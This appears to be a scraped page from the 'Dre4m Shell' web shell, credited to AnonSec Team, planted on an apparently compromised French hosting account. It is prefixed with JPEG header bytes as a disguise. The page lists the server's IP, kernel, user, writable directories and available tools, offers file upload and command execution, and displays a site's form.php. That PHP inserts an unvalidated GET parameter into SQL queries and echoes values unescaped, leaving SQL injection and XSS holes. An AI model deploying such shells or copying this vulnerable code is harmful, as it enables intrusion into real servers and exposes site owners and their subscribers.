ÿØÿàJFIF``ÿþxØ Dre4m Was Here
Dre4m Shell
Server IP : 109.234.164.53  /  Your IP : 216.73.216.110
Web Server : Apache
System : Linux cervelle.o2switch.net 4.18.0-553.32.1.lve.el8.x86_64 #1 SMP Thu Dec 19 13:14:03 UTC 2024 x86_64
User : computer3 ( 1098)
PHP Version : 7.1.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/computer3/vracandbio.com/seo-mailing/embedxxxxxxxxVersion_7/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /home/computer3/vracandbio.com/seo-mailing/embedxxxxxxxxVersion_7/form.php
<?php
if(isset($_GET['form'])){
require_once('../_config.php');
$result = mysql_query("SELECT * FROM ".$INFO['sql_tbl_prefix']."subscription_forms WHERE sha(id) = '{$_GET['form']}' LIMIT 1");
$form = mysql_fetch_array($result, MYSQL_ASSOC);
if($form['status'] == 0){?>
	<div>
    	<?php echo __('This subscription form turned off')?>
    </div>
<?php }else{ ?>
<!doctype html>
<html>
<head>
<meta charset="utf-8">
<title></title>
<style type="text/css">
<?php echo $form['css']?>
</style>
<!--[if lt IE 9]>
<script src="http://html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.1/jquery.min.js"></script>
<script src="http://php.foxsash.com/fes/assets/js/form.js"></script>
<script type='text/javascript'>
jQuery.noConflict()(function($){
$(document).ready(function(){
  var options = { 
	target: '#fes-output',
    	beforeSubmit: showRequest,
    	success: showResponse,
    	timeout: 3000
  };
  $('#fes-form').submit(function() {
    $(this).ajaxSubmit(options);
    return false;
  }); 
});
function showRequest(formData, jqForm, options) {
    var queryString = $.param(formData);
    return true;
}
function showResponse(responseText, statusText)  {
}
})
</script>
</head>
<body>
<form action='http://php.foxsash.com/fes/embed/index.php' style='width:<?php echo $form['width']?>' method='post' id='fes-form'>
<h3><?php echo $form['title']?></h3>
<div id='fes-output'></div>
	<div class='fes-info'><?php echo $form['text']?></div>
    <input type="hidden" name="form" value="<?php echo $_GET['form']?>">
	<input type='text' name='fes-name' class='fes-input' value='' placeholder='Nom Prénom'>
	<input type='email' name='fes-email' class='fes-input' value='' placeholder='email@site.com'>
<?php 
	$gr = unserialize($form['id_group']);
	if($form['group_chk'] == 1 && count($gr) > 1){
		echo "<select name='fes-group' class='fes-select'>";
		foreach($gr as $v){
            $group_name = mysql_fetch_array(mysql_query("SELECT * FROM ".$INFO['sql_tbl_prefix']."mail_group WHERE id = {$v} LIMIT 1"), MYSQL_ASSOC); 
			echo '<option value="'.$v.'">'.$group_name['name'].'</option>';
		}
		echo "</select>";
	}else{
		if(isset($gr[0])){
			echo  "<input type='hidden' name='fes-group' value='".$gr[0]."'>";
		}
	}?>
	<input type='submit' id='fes-submit' class='fes-submit' value='Enregistrer'>
</form>
</body>
</html>
<?php 
}
	}else{?>
<?php }?>

Anon7 - 2022
AnonSec Team